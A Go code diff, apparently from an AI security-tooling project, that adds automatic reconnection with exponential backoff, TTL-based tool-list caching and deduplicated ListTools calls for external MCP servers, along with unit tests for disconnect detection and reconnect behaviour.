}
m.mu.Lock()
defer m.mu.Unlock()
if t, ok := m.tasks[conversationID]; ok && t != nil {
n := t.activeEinoExecuteAbortNote
t.activeEinoExecuteAbortNote = ""
return n
}
return ""
}
// SetInterruptContinueNote 在发起 ErrInterruptContinue 取消前写入用户补充说明(仅内存)。 // SetInterruptContinueNote 在发起 ErrInterruptContinue 取消前写入用户补充说明(仅内存)。
func (m *AgentTaskManager) SetInterruptContinueNote(conversationID, note string) { func (m *AgentTaskManager) SetInterruptContinueNote(conversationID, note string) {
conversationID = strings.TrimSpace(conversationID) conversationID = strings.TrimSpace(conversationID)
@@ -0,0 +1,40 @@
package handler
import (
"context"
"testing"
"time"
)
func TestAbortActiveEinoExecute(t *testing.T) {
m := NewAgentTaskManager()
conv := "conv-eino-exec-abort"
ctx, cancel := context.WithCancel(context.Background())
_, err := m.StartTask(conv, "test", func(error) {})
if err != nil {
t.Fatalf("StartTask: %v", err)
}
m.RegisterActiveEinoExecute(conv, cancel)
done := make(chan struct{})
go func() {
<-ctx.Done()
close(done)
}()
if !m.AbortActiveEinoExecute(conv, "跳过域名收集") {
t.Fatal("expected abort to succeed")
}
select {
case <-done:
case <-time.After(2 * time.Second):
t.Fatal("execute cancel did not propagate")
}
if got := m.TakeEinoExecuteAbortNote(conv); got != "跳过域名收集" {
t.Fatalf("abort note = %q, want 跳过域名收集", got)
}
m.UnregisterActiveEinoExecute(conv)
if m.AbortActiveEinoExecute(conv, "") {
t.Fatal("second abort should fail when no active execute")
}
}
+17
View File
@@ -190,6 +190,23 @@ func (c *lazySDKClient) Close() error {
return nil return nil
} }
// markDisconnected 在检测到传输层断连时关闭底层 session,避免 IsConnected 仍返回 true。
func (c *lazySDKClient) markDisconnected() {
c.mu.Lock()
inner := c.inner
sessionCancel := c.sessionCancel
c.inner = nil
c.sessionCancel = nil
c.mu.Unlock()
if sessionCancel != nil {
sessionCancel()
}
if inner != nil {
_ = inner.Close()
}
c.setStatus("disconnected")
}
func (c *sdkClient) setStatus(s string) { func (c *sdkClient) setStatus(s string) {
c.mu.Lock() c.mu.Lock()
defer c.mu.Unlock() defer c.mu.Unlock()
+192
View File
@@ -0,0 +1,192 @@
package mcp
import (
"context"
"errors"
"io"
"strings"
"time"
"go.uber.org/zap"
)
const (
// externalReconnectMinInterval 两次自动重连之间的最短间隔
externalReconnectMinInterval = 30 * time.Second
// externalReconnectMaxBackoff 指数退避上限
externalReconnectMaxBackoff = 5 * time.Minute
)
// isConnectionDeadError 判断错误是否表示底层传输已断开(而非调用方主动取消或超时)。
func isConnectionDeadError(err error) bool {
if err == nil {
return false
}
if errors.Is(err, context.Canceled) || errors.Is(err, context.DeadlineExceeded) {
return false
}
if errors.Is(err, io.EOF) {
return true
}
s := strings.ToLower(err.Error())
return strings.Contains(s, "eof") ||
strings.Contains(s, "client is closing") ||
strings.Contains(s, "connection closed") ||
strings.Contains(s, "connection reset") ||
strings.Contains(s, "broken pipe")
}
// handleConnectionDead 在 ListTools/CallTool 等操作失败且判定为断连时,标记客户端并调度重连。
func (m *ExternalMCPManager) handleConnectionDead(name string, client ExternalMCPClient, err error) {
if !isConnectionDeadError(err) {
return
}
m.logger.Warn("检测到外部MCP连接已断开,将尝试自动重连",
zap.String("name", name),
zap.Error(err),
)
m.markClientDisconnected(name, client, err)
m.scheduleReconnect(name)
}
func (m *ExternalMCPManager) markClientDisconnected(name string, client ExternalMCPClient, err error) {
if lazy, ok := client.(*lazySDKClient); ok {
lazy.markDisconnected()
}
m.mu.Lock()
if err != nil {
m.errors[name] = "连接已断开: " + err.Error()
}
m.mu.Unlock()
m.toolCountsMu.Lock()
m.toolCounts[name] = 0
m.toolCountsMu.Unlock()
}
func (m *ExternalMCPManager) onClientConnected(name string) {
m.clearReconnectState(name)
}
func (m *ExternalMCPManager) clearReconnectState(name string) {
m.reconnectMu.Lock()
delete(m.reconnectAttempts, name)
delete(m.reconnectLastTry, name)
delete(m.reconnecting, name)
m.reconnectMu.Unlock()
}
func (m *ExternalMCPManager) reconnectBackoff(attempts int) time.Duration {
if attempts <= 0 {
return 0
}
d := externalReconnectMinInterval
for i := 1; i < attempts && d < externalReconnectMaxBackoff; i++ {
d *= 2
}
if d > externalReconnectMaxBackoff {
return externalReconnectMaxBackoff
}
return d
}
func (m *ExternalMCPManager) scheduleReconnect(name string) {
m.mu.RLock()
cfg, exists := m.configs[name]
enabled := exists && m.isEnabled(cfg)
m.mu.RUnlock()
if !enabled {
return
}
go m.tryReconnect(name)
}
func (m *ExternalMCPManager) tryReconnect(name string) {
m.reconnectMu.Lock()
if m.reconnecting[name] {
m.reconnectMu.Unlock()
return
}
attempts := m.reconnectAttempts[name]
if wait := m.reconnectBackoff(attempts); wait > 0 {
if last, ok := m.reconnectLastTry[name]; ok {
if elapsed := time.Since(last); elapsed < wait {
remaining := wait - elapsed
m.reconnectMu.Unlock()
m.scheduleReconnectAfter(name, remaining)
return
}
}
}
m.reconnecting[name] = true
m.reconnectMu.Unlock()
defer func() {
m.reconnectMu.Lock()
delete(m.reconnecting, name)
m.reconnectMu.Unlock()
}()
m.mu.RLock()
cfg, exists := m.configs[name]
enabled := exists && m.isEnabled(cfg)
client, hasClient := m.clients[name]
connecting := hasClient && client.GetStatus() == "connecting"
m.mu.RUnlock()
if !enabled {
m.logger.Debug("跳过自动重连(外部MCP已停用)", zap.String("name", name))
return
}
if connecting {
m.logger.Debug("跳过自动重连(连接正在进行中)", zap.String("name", name))
return
}
m.reconnectMu.Lock()
m.reconnectLastTry[name] = time.Now()
m.reconnectAttempts[name] = attempts + 1
attemptNum := m.reconnectAttempts[name]
m.reconnectMu.Unlock()
m.logger.Info("正在自动重连外部MCP",
zap.String("name", name),
zap.Int("attempt", attemptNum),
)
if err := m.startClient(name, true); err != nil {
m.logger.Warn("自动重连外部MCP失败",
zap.String("name", name),
zap.Error(err),
)
}
}
// scheduleReconnectAfterFailure 在自动重连失败后,按当前退避间隔预约下一次重试。
func (m *ExternalMCPManager) scheduleReconnectAfterFailure(name string) {
m.mu.RLock()
cfg, exists := m.configs[name]
enabled := exists && m.isEnabled(cfg)
m.mu.RUnlock()
if !enabled {
return
}
m.reconnectMu.Lock()
wait := m.reconnectBackoff(m.reconnectAttempts[name])
m.reconnectMu.Unlock()
m.logger.Info("自动重连失败,将按退避间隔再次尝试",
zap.String("name", name),
zap.Duration("after", wait),
)
m.scheduleReconnectAfter(name, wait)
}
// scheduleReconnectAfter 在 delay 后触发 tryReconnectdelay<=0 时立即执行)。
func (m *ExternalMCPManager) scheduleReconnectAfter(name string, delay time.Duration) {
if delay <= 0 {
go m.tryReconnect(name)
return
}
time.AfterFunc(delay, func() {
m.tryReconnect(name)
})
}
+215
View File
@@ -0,0 +1,215 @@
package mcp
import (
"context"
"errors"
"fmt"
"io"
"testing"
"time"
"cyberstrike-ai/internal/config"
"go.uber.org/zap"
)
func TestIsConnectionDeadError(t *testing.T) {
t.Parallel()
cases := []struct {
name string
err error
want bool
}{
{"nil", nil, false},
{"eof", io.EOF, true},
{"wrapped eof", fmt.Errorf("connection closed: %w", io.EOF), true},
{"client closing", errors.New(`calling "tools/list": client is closing: EOF`), true},
{"connection reset", errors.New("read tcp: connection reset by peer"), true},
{"canceled", context.Canceled, false},
{"deadline", context.DeadlineExceeded, false},
{"other", errors.New("invalid params"), false},
}
for _, tc := range cases {
tc := tc
t.Run(tc.name, func(t *testing.T) {
t.Parallel()
if got := isConnectionDeadError(tc.err); got != tc.want {
t.Fatalf("isConnectionDeadError(%v) = %v, want %v", tc.err, got, tc.want)
}
})
}
}
func TestLazySDKClient_MarkDisconnected(t *testing.T) {
c := &lazySDKClient{status: "connected"}
c.inner = &sdkClient{status: "connected"}
c.markDisconnected()
if c.IsConnected() {
t.Fatal("expected disconnected after markDisconnected")
}
if c.GetStatus() != "disconnected" {
t.Fatalf("expected status disconnected, got %s", c.GetStatus())
}
}
func TestHandleConnectionDead_MarksLazyClientDisconnected(t *testing.T) {
logger := zap.NewNop()
m := NewExternalMCPManager(logger)
name := "dead-mcp"
cfg := config.ExternalMCPServerConfig{
Type: "http",
URL: "http://example.com/mcp",
ExternalMCPEnable: true,
}
m.mu.Lock()
m.configs[name] = cfg
client := newLazySDKClient(cfg, logger)
client.inner = &sdkClient{status: "connected"}
client.status = "connected"
m.clients[name] = client
m.mu.Unlock()
deadErr := errors.New(`connection closed: calling "tools/list": client is closing: EOF`)
m.handleConnectionDead(name, client, deadErr)
if client.IsConnected() {
t.Fatal("expected disconnected after handleConnectionDead")
}
if m.GetError(name) == "" {
t.Fatal("expected error message to be recorded")
}
counts := m.GetToolCounts()
if counts[name] != 0 {
t.Fatalf("expected tool count 0 after disconnect, got %d", counts[name])
}
}
func TestReconnectBackoff(t *testing.T) {
t.Parallel()
if d := (&ExternalMCPManager{}).reconnectBackoff(0); d != 0 {
t.Fatalf("attempt 0: got %v", d)
}
if d := (&ExternalMCPManager{}).reconnectBackoff(1); d != externalReconnectMinInterval {
t.Fatalf("attempt 1: got %v", d)
}
if d := (&ExternalMCPManager{}).reconnectBackoff(10); d != externalReconnectMaxBackoff {
t.Fatalf("attempt 10: got %v, want cap %v", d, externalReconnectMaxBackoff)
}
}
func TestTryReconnect_RateLimited(t *testing.T) {
logger := zap.NewNop()
m := NewExternalMCPManager(logger)
name := "rate-limited"
m.reconnectMu.Lock()
m.reconnectLastTry[name] = time.Now()
m.reconnectAttempts[name] = 2
m.reconnectMu.Unlock()
m.tryReconnect(name)
m.reconnectMu.Lock()
attempts := m.reconnectAttempts[name]
m.reconnectMu.Unlock()
if attempts != 2 {
t.Fatalf("rate limited reconnect should not increment attempts, got %d", attempts)
}
}
func TestTryReconnect_SkipsWhenDisabled(t *testing.T) {
logger := zap.NewNop()
m := NewExternalMCPManager(logger)
name := "disabled-mcp"
m.mu.Lock()
m.configs[name] = config.ExternalMCPServerConfig{
Type: "http",
URL: "http://example.com/mcp",
ExternalMCPEnable: false,
}
m.mu.Unlock()
m.tryReconnect(name)
m.reconnectMu.Lock()
attempts := m.reconnectAttempts[name]
m.reconnectMu.Unlock()
if attempts != 0 {
t.Fatalf("disabled MCP should not increment reconnect attempts, got %d", attempts)
}
}
func TestTryReconnect_SkipsWhenConnecting(t *testing.T) {
logger := zap.NewNop()
m := NewExternalMCPManager(logger)
name := "connecting-mcp"
cfg := config.ExternalMCPServerConfig{
Type: "http",
URL: "http://example.com/mcp",
ExternalMCPEnable: true,
}
client := newLazySDKClient(cfg, logger)
client.setStatus("connecting")
m.mu.Lock()
m.configs[name] = cfg
m.clients[name] = client
m.mu.Unlock()
m.tryReconnect(name)
m.reconnectMu.Lock()
attempts := m.reconnectAttempts[name]
m.reconnectMu.Unlock()
if attempts != 0 {
t.Fatalf("connecting MCP should not increment reconnect attempts, got %d", attempts)
}
}
func TestStartClientAutoReconnect_SkipsWhenDisabled(t *testing.T) {
logger := zap.NewNop()
m := NewExternalMCPManager(logger)
m.stopRefresh = make(chan struct{})
name := "stopped"
m.mu.Lock()
m.configs[name] = config.ExternalMCPServerConfig{
Type: "http",
URL: "http://example.com/mcp",
ExternalMCPEnable: false,
}
m.mu.Unlock()
if err := m.startClient(name, true); err != nil {
t.Fatalf("startClient: %v", err)
}
m.mu.RLock()
cfg := m.configs[name]
_, hasClient := m.clients[name]
m.mu.RUnlock()
if cfg.ExternalMCPEnable {
t.Fatal("auto reconnect should not enable stopped MCP")
}
if hasClient {
t.Fatal("auto reconnect should not create client when disabled")
}
}
func TestOnClientConnected_ClearsReconnectState(t *testing.T) {
m := &ExternalMCPManager{
reconnectAttempts: map[string]int{"x": 3},
reconnectLastTry: map[string]time.Time{"x": time.Now()},
reconnecting: map[string]bool{"x": true},
}
m.onClientConnected("x")
m.reconnectMu.Lock()
defer m.reconnectMu.Unlock()
if len(m.reconnectAttempts) != 0 || len(m.reconnectLastTry) != 0 || len(m.reconnecting) != 0 {
t.Fatal("expected reconnect state cleared")
}
}
+217 -76
View File
@@ -15,6 +15,26 @@ import (
"go.uber.org/zap" "go.uber.org/zap"
) )
const (
// externalToolListCacheTTL 已连接外部 MCP 的工具列表缓存有效期,避免每次 API 请求都打远程 ListTools。
externalToolListCacheTTL = 60 * time.Second
// externalToolCountRefreshInterval 后台刷新工具数量的间隔(仅刷新缓存过期或缺失的客户端)。
externalToolCountRefreshInterval = 60 * time.Second
)
// toolListCacheEntry 外部 MCP 工具列表缓存条目
type toolListCacheEntry struct {
tools []Tool
updatedAt time.Time
}
// listToolsInflight 合并同一 MCP 上并发的 ListTools 请求
type listToolsInflight struct {
done chan struct{}
tools []Tool
err error
}
// ExternalMCPManager 外部MCP管理器 // ExternalMCPManager 外部MCP管理器
type ExternalMCPManager struct { type ExternalMCPManager struct {
clients map[string]ExternalMCPClient clients map[string]ExternalMCPClient
@@ -26,14 +46,20 @@ type ExternalMCPManager struct {
errors map[string]string // 错误信息 errors map[string]string // 错误信息
toolCounts map[string]int // 工具数量缓存 toolCounts map[string]int // 工具数量缓存
toolCountsMu sync.RWMutex // 工具数量缓存的锁 toolCountsMu sync.RWMutex // 工具数量缓存的锁
toolCache map[string][]Tool // 工具列表缓存:MCP名称 -> 工具列表 toolCache map[string]toolListCacheEntry // 工具列表缓存:MCP名称 -> 工具列表
toolCacheMu sync.RWMutex // 工具列表缓存的锁 toolCacheMu sync.RWMutex // 工具列表缓存的锁
listToolsMu sync.Mutex
listToolsInflight map[string]*listToolsInflight
stopRefresh chan struct{} // 停止后台刷新的信号 stopRefresh chan struct{} // 停止后台刷新的信号
refreshWg sync.WaitGroup // 等待后台刷新goroutine完成 refreshWg sync.WaitGroup // 等待后台刷新goroutine完成
refreshing atomic.Bool // 防止 refreshToolCounts 并发堆积 refreshing atomic.Bool // 防止 refreshToolCounts 并发堆积
mu sync.RWMutex mu sync.RWMutex
runningCancels map[string]context.CancelFunc runningCancels map[string]context.CancelFunc
abortUserNotes map[string]string abortUserNotes map[string]string
reconnectMu sync.Mutex
reconnecting map[string]bool
reconnectLastTry map[string]time.Time
reconnectAttempts map[string]int
} }
// NewExternalMCPManager 创建外部MCP管理器 // NewExternalMCPManager 创建外部MCP管理器
@@ -51,11 +77,15 @@ func NewExternalMCPManagerWithStorage(logger *zap.Logger, storage MonitorStorage
executions: make(map[string]*ToolExecution), executions: make(map[string]*ToolExecution),
stats: make(map[string]*ToolStats), stats: make(map[string]*ToolStats),
errors: make(map[string]string), errors: make(map[string]string),
toolCounts: make(map[string]int), toolCounts: make(map[string]int),
toolCache: make(map[string][]Tool), toolCache: make(map[string]toolListCacheEntry),
stopRefresh: make(chan struct{}), listToolsInflight: make(map[string]*listToolsInflight),
runningCancels: make(map[string]context.CancelFunc), stopRefresh: make(chan struct{}),
abortUserNotes: make(map[string]string), runningCancels: make(map[string]context.CancelFunc),
abortUserNotes: make(map[string]string),
reconnecting: make(map[string]bool),
reconnectLastTry: make(map[string]time.Time),
reconnectAttempts: make(map[string]int),
} }
// 启动后台刷新工具数量的goroutine // 启动后台刷新工具数量的goroutine
manager.startToolCountRefresh() manager.startToolCountRefresh()
@@ -122,6 +152,7 @@ func (m *ExternalMCPManager) RemoveConfig(name string) error {
} }
delete(m.configs, name) delete(m.configs, name)
m.clearReconnectState(name)
// 清理工具数量缓存 // 清理工具数量缓存
m.toolCountsMu.Lock() m.toolCountsMu.Lock()
@@ -136,8 +167,13 @@ func (m *ExternalMCPManager) RemoveConfig(name string) error {
return nil return nil
} }
// StartClient 启动客户端 // StartClient 启动客户端(用户手动启动;连接失败不自动重试)
func (m *ExternalMCPManager) StartClient(name string) error { func (m *ExternalMCPManager) StartClient(name string) error {
return m.startClient(name, false)
}
// startClient 启动客户端。autoReconnect 为 true 时用于断连自愈:尊重停用状态,失败后按退避继续重试。
func (m *ExternalMCPManager) startClient(name string, autoReconnect bool) error {
m.mu.Lock() m.mu.Lock()
serverCfg, exists := m.configs[name] serverCfg, exists := m.configs[name]
m.mu.Unlock() m.mu.Unlock()
@@ -146,6 +182,10 @@ func (m *ExternalMCPManager) StartClient(name string) error {
return fmt.Errorf("配置不存在: %s", name) return fmt.Errorf("配置不存在: %s", name)
} }
if autoReconnect && !m.isEnabled(serverCfg) {
return nil
}
// 检查是否已经有连接的客户端 // 检查是否已经有连接的客户端
m.mu.RLock() m.mu.RLock()
existingClient, hasClient := m.clients[name] existingClient, hasClient := m.clients[name]
@@ -155,11 +195,12 @@ func (m *ExternalMCPManager) StartClient(name string) error {
// 检查客户端是否已连接 // 检查客户端是否已连接
if existingClient.IsConnected() { if existingClient.IsConnected() {
// 客户端已连接,直接返回成功(目标状态已达成) // 客户端已连接,直接返回成功(目标状态已达成)
// 更新配置为启用(确保配置一致) if !autoReconnect {
m.mu.Lock() m.mu.Lock()
serverCfg.ExternalMCPEnable = true serverCfg.ExternalMCPEnable = true
m.configs[name] = serverCfg m.configs[name] = serverCfg
m.mu.Unlock() m.mu.Unlock()
}
return nil return nil
} }
// 如果有客户端但未连接,先关闭 // 如果有客户端但未连接,先关闭
@@ -169,6 +210,16 @@ func (m *ExternalMCPManager) StartClient(name string) error {
m.mu.Unlock() m.mu.Unlock()
} }
if autoReconnect {
m.mu.RLock()
serverCfg, exists = m.configs[name]
enabled := exists && m.isEnabled(serverCfg)
m.mu.RUnlock()
if !enabled {
return nil
}
}
// 更新配置为启用 // 更新配置为启用
m.mu.Lock() m.mu.Lock()
serverCfg.ExternalMCPEnable = true serverCfg.ExternalMCPEnable = true
@@ -192,10 +243,11 @@ func (m *ExternalMCPManager) StartClient(name string) error {
m.mu.Unlock() m.mu.Unlock()
// 在后台异步进行实际连接 // 在后台异步进行实际连接
go func() { go func(reconnect bool) {
if err := m.doConnect(name, serverCfg, client); err != nil { if err := m.doConnect(name, serverCfg, client); err != nil {
m.logger.Error("连接外部MCP客户端失败", m.logger.Error("连接外部MCP客户端失败",
zap.String("name", name), zap.String("name", name),
zap.Bool("auto_reconnect", reconnect),
zap.Error(err), zap.Error(err),
) )
// 连接失败,设置状态为error并保存错误信息 // 连接失败,设置状态为error并保存错误信息
@@ -205,22 +257,19 @@ func (m *ExternalMCPManager) StartClient(name string) error {
m.mu.Unlock() m.mu.Unlock()
// 触发工具数量刷新(连接失败,工具数量应为0) // 触发工具数量刷新(连接失败,工具数量应为0)
m.triggerToolCountRefresh() m.triggerToolCountRefresh()
if reconnect {
m.scheduleReconnectAfterFailure(name)
}
} else { } else {
// 连接成功,清除错误信息 // 连接成功,清除错误信息
m.mu.Lock() m.mu.Lock()
delete(m.errors, name) delete(m.errors, name)
m.mu.Unlock() m.mu.Unlock()
// 立即刷新工具数量和工具列表缓存 m.onClientConnected(name)
m.triggerToolCountRefresh() // 异步拉取工具列表(singleflight 去重,结果同时写入 toolCache 与 toolCounts
m.refreshToolCache(name, client) go m.refreshToolCache(name, client)
// 2 秒后再刷新一次,覆盖 SSE/Streamable 等需稍等就绪的远端
go func() {
time.Sleep(2 * time.Second)
m.triggerToolCountRefresh()
m.refreshToolCache(name, client)
}()
} }
}() }(autoReconnect)
return nil return nil
} }
@@ -249,10 +298,16 @@ func (m *ExternalMCPManager) StopClient(name string) error {
m.toolCounts[name] = 0 m.toolCounts[name] = 0
m.toolCountsMu.Unlock() m.toolCountsMu.Unlock()
m.toolCacheMu.Lock()
delete(m.toolCache, name)
m.toolCacheMu.Unlock()
// 更新配置为禁用 // 更新配置为禁用
serverCfg.ExternalMCPEnable = false serverCfg.ExternalMCPEnable = false
m.configs[name] = serverCfg m.configs[name] = serverCfg
m.clearReconnectState(name)
return nil return nil
} }
@@ -335,16 +390,19 @@ func (m *ExternalMCPManager) getToolsForClient(name string, client ExternalMCPCl
return nil, fmt.Errorf("外部MCP连接失败: %s", name) return nil, fmt.Errorf("外部MCP连接失败: %s", name)
} }
// 已连接:尝试获取最新工具列表 // 已连接:缓存优先,仅在缺失或过期时打远程 ListTools
if client.IsConnected() { if client.IsConnected() {
tools, err := client.ListTools(ctx) if tools, ok := m.getFreshCachedTools(name); ok {
return tools, nil
}
if tools, ok := m.getAnyCachedTools(name); ok {
m.triggerToolListRefresh(name, client)
return tools, nil
}
tools, err := m.listToolsDeduped(ctx, name, client)
if err != nil { if err != nil {
// 获取失败,尝试使用缓存
return m.getCachedTools(name, "连接正常但获取失败", err) return m.getCachedTools(name, "连接正常但获取失败", err)
} }
// 获取成功,更新缓存
m.updateToolCache(name, tools)
return tools, nil return tools, nil
} }
@@ -361,37 +419,127 @@ func (m *ExternalMCPManager) getToolsForClient(name string, client ExternalMCPCl
return nil, fmt.Errorf("外部MCP状态未知: %s (状态: %s)", name, status) return nil, fmt.Errorf("外部MCP状态未知: %s (状态: %s)", name, status)
} }
// getCachedTools 获取缓存的工具列表 // getCachedTools 获取缓存的工具列表(含空列表缓存)
func (m *ExternalMCPManager) getCachedTools(name, reason string, originalErr error) ([]Tool, error) { func (m *ExternalMCPManager) getCachedTools(name, reason string, originalErr error) ([]Tool, error) {
m.toolCacheMu.RLock() if tools, ok := m.getAnyCachedTools(name); ok {
cachedTools, hasCache := m.toolCache[name]
m.toolCacheMu.RUnlock()
if hasCache && len(cachedTools) > 0 {
m.logger.Debug("使用缓存的工具列表", m.logger.Debug("使用缓存的工具列表",
zap.String("name", name), zap.String("name", name),
zap.String("reason", reason), zap.String("reason", reason),
zap.Int("count", len(cachedTools)), zap.Int("count", len(tools)),
zap.Error(originalErr), zap.Error(originalErr),
) )
return cachedTools, nil return tools, nil
} }
// 无缓存,返回错误
if originalErr != nil { if originalErr != nil {
return nil, fmt.Errorf("获取外部MCP工具失败且无缓存: %w", originalErr) return nil, fmt.Errorf("获取外部MCP工具失败且无缓存: %w", originalErr)
} }
return nil, fmt.Errorf("外部MCP无缓存工具: %s", name) return nil, fmt.Errorf("外部MCP无缓存工具: %s", name)
} }
// updateToolCache 更新工具列表缓存 func (m *ExternalMCPManager) isToolCacheFresh(updatedAt time.Time) bool {
func (m *ExternalMCPManager) updateToolCache(name string, tools []Tool) { return !updatedAt.IsZero() && time.Since(updatedAt) < externalToolListCacheTTL
}
func cloneTools(tools []Tool) []Tool {
if len(tools) == 0 {
return nil
}
out := make([]Tool, len(tools))
copy(out, tools)
return out
}
func (m *ExternalMCPManager) getFreshCachedTools(name string) ([]Tool, bool) {
m.toolCacheMu.RLock()
entry, ok := m.toolCache[name]
m.toolCacheMu.RUnlock()
if !ok || !m.isToolCacheFresh(entry.updatedAt) {
return nil, false
}
return cloneTools(entry.tools), true
}
func (m *ExternalMCPManager) getAnyCachedTools(name string) ([]Tool, bool) {
m.toolCacheMu.RLock()
entry, ok := m.toolCache[name]
m.toolCacheMu.RUnlock()
if !ok {
return nil, false
}
return cloneTools(entry.tools), true
}
// listToolsDeduped 对同一 MCP 合并并发 ListTools,并更新 toolCache / toolCounts。
func (m *ExternalMCPManager) listToolsDeduped(ctx context.Context, name string, client ExternalMCPClient) ([]Tool, error) {
m.listToolsMu.Lock()
if inflight, exists := m.listToolsInflight[name]; exists {
m.listToolsMu.Unlock()
select {
case <-inflight.done:
if inflight.err != nil {
return nil, inflight.err
}
return cloneTools(inflight.tools), nil
case <-ctx.Done():
return nil, ctx.Err()
}
}
inflight := &listToolsInflight{done: make(chan struct{})}
m.listToolsInflight[name] = inflight
m.listToolsMu.Unlock()
inflight.tools, inflight.err = client.ListTools(ctx)
if inflight.err == nil {
m.updateToolCache(name, inflight.tools)
}
m.listToolsMu.Lock()
delete(m.listToolsInflight, name)
close(inflight.done)
m.listToolsMu.Unlock()
if inflight.err != nil {
m.handleConnectionDead(name, client, inflight.err)
return nil, inflight.err
}
return cloneTools(inflight.tools), nil
}
// InvalidateToolCache 清除指定外部 MCP 的工具列表缓存(手动刷新时使用)
func (m *ExternalMCPManager) InvalidateToolCache(name string) {
m.toolCacheMu.Lock() m.toolCacheMu.Lock()
m.toolCache[name] = tools delete(m.toolCache, name)
m.toolCacheMu.Unlock()
}
// InvalidateAllToolCaches 清除所有外部 MCP 工具列表缓存
func (m *ExternalMCPManager) InvalidateAllToolCaches() {
m.toolCacheMu.Lock()
m.toolCache = make(map[string]toolListCacheEntry)
m.toolCacheMu.Unlock()
}
func (m *ExternalMCPManager) triggerToolListRefresh(name string, client ExternalMCPClient) {
go func() {
ctx, cancel := context.WithTimeout(context.Background(), 15*time.Second)
defer cancel()
_, _ = m.listToolsDeduped(ctx, name, client)
}()
}
// updateToolCache 更新工具列表缓存与工具数量
func (m *ExternalMCPManager) updateToolCache(name string, tools []Tool) {
stored := cloneTools(tools)
m.toolCacheMu.Lock()
m.toolCache[name] = toolListCacheEntry{tools: stored, updatedAt: time.Now()}
m.toolCacheMu.Unlock() m.toolCacheMu.Unlock()
// 如果返回空列表,记录警告 m.toolCountsMu.Lock()
if len(tools) == 0 { m.toolCounts[name] = len(stored)
m.toolCountsMu.Unlock()
if len(stored) == 0 {
m.logger.Warn("外部MCP返回空工具列表", m.logger.Warn("外部MCP返回空工具列表",
zap.String("name", name), zap.String("name", name),
zap.String("hint", "服务可能暂时不可用,工具列表为空"), zap.String("hint", "服务可能暂时不可用,工具列表为空"),
@@ -399,7 +547,7 @@ func (m *ExternalMCPManager) updateToolCache(name string, tools []Tool) {
} else { } else {
m.logger.Debug("工具列表缓存已更新", m.logger.Debug("工具列表缓存已更新",
zap.String("name", name), zap.String("name", name),
zap.Int("count", len(tools)), zap.Int("count", len(stored)),
) )
} }
} }
@@ -467,6 +615,9 @@ func (m *ExternalMCPManager) CallTool(ctx context.Context, toolName string, args
// 调用工具 // 调用工具
result, err := client.CallTool(execCtx, actualToolName, args) result, err := client.CallTool(execCtx, actualToolName, args)
if err != nil {
m.handleConnectionDead(mcpName, client, err)
}
cancelledWithUserNote := m.applyAbortUserNoteToCancelledToolResult(executionID, &result, &err) cancelledWithUserNote := m.applyAbortUserNoteToCancelledToolResult(executionID, &result, &err)
// 更新执行记录 // 更新执行记录
@@ -854,28 +1005,27 @@ func (m *ExternalMCPManager) refreshToolCounts() {
return return
} }
// 使用合理的超时时间(15秒),既能应对网络延迟,又不会过长阻塞 // 缓存仍新鲜时直接复用,避免与 GetAllTools 重复打远程
// 由于这是后台异步刷新,超时不会影响前端响应 if _, fresh := m.getFreshCachedTools(n); fresh {
m.toolCountsMu.RLock()
count := m.toolCounts[n]
m.toolCountsMu.RUnlock()
resultChan <- countResult{name: n, count: count}
return
}
ctx, cancel := context.WithTimeout(context.Background(), 15*time.Second) ctx, cancel := context.WithTimeout(context.Background(), 15*time.Second)
tools, err := c.ListTools(ctx) tools, err := m.listToolsDeduped(ctx, n, c)
cancel() cancel()
if err != nil { if err != nil {
errStr := err.Error() if !isConnectionDeadError(err) {
// SSE 连接 EOF:远端可能关闭了流或未按规范在流上推送响应,仅首次用 Warn 提示
if strings.Contains(errStr, "EOF") || strings.Contains(errStr, "client is closing") {
m.logger.Warn("获取外部MCP工具数量失败(SSE 流已关闭或服务端未在流上返回 tools/list 响应)",
zap.String("name", n),
zap.String("hint", "若为 SSE 连接,请确认服务端保持 GET 流打开并按 MCP 规范以 event: message 推送 JSON-RPC 响应"),
zap.Error(err),
)
} else {
m.logger.Warn("获取外部MCP工具数量失败,请检查连接或服务端 tools/list", m.logger.Warn("获取外部MCP工具数量失败,请检查连接或服务端 tools/list",
zap.String("name", n), zap.String("name", n),
zap.Error(err), zap.Error(err),
) )
} }
resultChan <- countResult{name: n, count: -1} // -1 表示使用旧值 resultChan <- countResult{name: n, count: -1}
return return
} }
@@ -925,33 +1075,21 @@ func (m *ExternalMCPManager) refreshToolCache(name string, client ExternalMCPCli
if !client.IsConnected() { if !client.IsConnected() {
return return
} }
if client.GetStatus() == "error" {
// 检查状态,如果是error状态,不更新缓存
status := client.GetStatus()
if status == "error" {
m.logger.Debug("跳过刷新工具列表缓存(连接失败)", m.logger.Debug("跳过刷新工具列表缓存(连接失败)",
zap.String("name", name), zap.String("name", name),
zap.String("status", status),
) )
return return
} }
// 使用较短的超时时间(5秒) ctx, cancel := context.WithTimeout(context.Background(), 15*time.Second)
ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second)
defer cancel() defer cancel()
if _, err := m.listToolsDeduped(ctx, name, client); err != nil {
tools, err := client.ListTools(ctx)
if err != nil {
m.logger.Debug("刷新工具列表缓存失败", m.logger.Debug("刷新工具列表缓存失败",
zap.String("name", name), zap.String("name", name),
zap.Error(err), zap.Error(err),
) )
// 刷新失败时不更新缓存,保留旧缓存(如果有)
return
} }
// 使用统一的缓存更新方法
m.updateToolCache(name, tools)
} }
// startToolCountRefresh 启动后台刷新工具数量的goroutine // startToolCountRefresh 启动后台刷新工具数量的goroutine
@@ -959,7 +1097,7 @@ func (m *ExternalMCPManager) startToolCountRefresh() {
m.refreshWg.Add(1) m.refreshWg.Add(1)
go func() { go func() {
defer m.refreshWg.Done() defer m.refreshWg.Done()
ticker := time.NewTicker(10 * time.Second) // 每10秒刷新一次 ticker := time.NewTicker(externalToolCountRefreshInterval)
defer ticker.Stop() defer ticker.Stop()
// 立即执行一次刷新 // 立即执行一次刷新
@@ -1075,6 +1213,8 @@ func (m *ExternalMCPManager) connectClient(name string, serverCfg config.Externa
zap.String("name", name), zap.String("name", name),
) )
m.onClientConnected(name)
// 连接成功,触发工具数量刷新和工具列表缓存刷新 // 连接成功,触发工具数量刷新和工具列表缓存刷新
m.triggerToolCountRefresh() m.triggerToolCountRefresh()
m.mu.RLock() m.mu.RLock()
@@ -1159,6 +1299,7 @@ func (m *ExternalMCPManager) StopAll() {
for name, client := range m.clients { for name, client := range m.clients {
client.Close() client.Close()
delete(m.clients, name) delete(m.clients, name)
m.clearReconnectState(name)
} }
// 清理所有工具数量缓存 // 清理所有工具数量缓存
